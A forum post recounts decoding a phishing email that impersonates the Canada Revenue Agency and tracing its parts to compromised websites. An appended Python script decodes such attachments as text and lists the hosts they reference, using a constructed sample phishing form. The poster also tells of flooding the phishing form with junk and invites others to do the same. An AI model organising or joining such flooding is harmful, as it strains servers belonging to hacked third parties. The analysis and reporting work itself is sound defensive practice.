We received a phishing email at our resume@ email address this morning. Apparently, it was from Revenue Canada looking for my tax information. Luckily, my HR girl is awesome and didn't open it and just forwarded it to me to look at!
When I opened the file, it was all URL encoded to obfuscate the actual code. Nifty, but very easy to get around. I copied the obfuscated code, wrote a three-line PHP script and pasted the code into it. Out came a text file with the actual HTML. Upon inspection, it looks like the header image from the CRA is actually being hosted on a radio station's website a mere five hours away! The PHP script that the form is submitted to, as well as some JavaScript input validation code, is hosted on some Nigerian university's website (surprise surprise?).
So after finding the contents of the file rather harmless, I decided to have a little fun. I did the only thing I could think of to get back at them, and I filled the form out a few times with completely random and rather obscene info. Then I emailed the two website owners to notify them that they were most likely hacked and should consider changing passwords, patching, and deleting the offending content.
Not exactly what I thought I'd be doing this morning, but hey... it was kinda fun playing detective :)
Is there some place I should/could be submitting this "analysis" to, like Webroot, or Sophos or something?
Anyone interested in helping to "spread the joy" and overload them with more random crap info for a while until it finally gets taken down?
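
The decode-and-inspect step described in the post, as an added example that is not part of the original post: it percent-decodes an attachment as text (never rendering it) and groups the hosts that the form, scripts and images point at, which is what you need for abuse reports. The `unescape('...')` wrapper, the function names and the `example.org`/`example.net` hosts are assumptions, and the sample attachment is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Tag/attribute pairs that make the page contact another server.
WATCHED = {("form", "action"), ("script", "src"), ("img", "src")}

# Constructed sample: placeholder hosts, every byte percent-encoded.
PLAIN = ('<html><body><img src="http://radio.example.org/cra-header.png">'
         '<script src="http://uni.example.net/validate.js"></script>'
         '<form action="http://uni.example.net/submit.php" method="post">'
         '<input name="sin"></form></body></html>')
SAMPLE = ("<script>document.write(unescape('"
          + "".join("%%%02X" % b for b in PLAIN.encode()) + "'));</script>")

def decode_layers(text, max_rounds=5):
    """Percent-decode repeatedly until stable, to peel nested encoding."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

class ResourceCollector(HTMLParser):
    """Record watched URL attributes while parsing; nothing is fetched or run."""
    def __init__(self):
        super().__init__()
        self.found = []  # (tag, attribute, url)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) in WATCHED and value:
                self.found.append((tag, name, value))

def triage(attachment_text):
    """Return (decoded_html, {host: [(tag, attr, url), ...]})."""
    # Assumption: payload is either bare or wrapped in unescape('...').
    wrapped = re.findall(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", attachment_text)
    html = decode_layers("".join(wrapped) if wrapped else attachment_text)
    collector = ResourceCollector()
    collector.feed(html)
    by_host = {}
    for tag, attr, url in collector.found:
        host = urlsplit(url).hostname or "(relative)"
        by_host.setdefault(host, []).append((tag, attr, url))
    return html, by_host

if __name__ == "__main__":
    for host, refs in triage(SAMPLE)[1].items():
        print(host, refs)
```

The per-host grouping maps directly onto who to notify: the image host and the form/script host are usually separate compromised sites, as in the post.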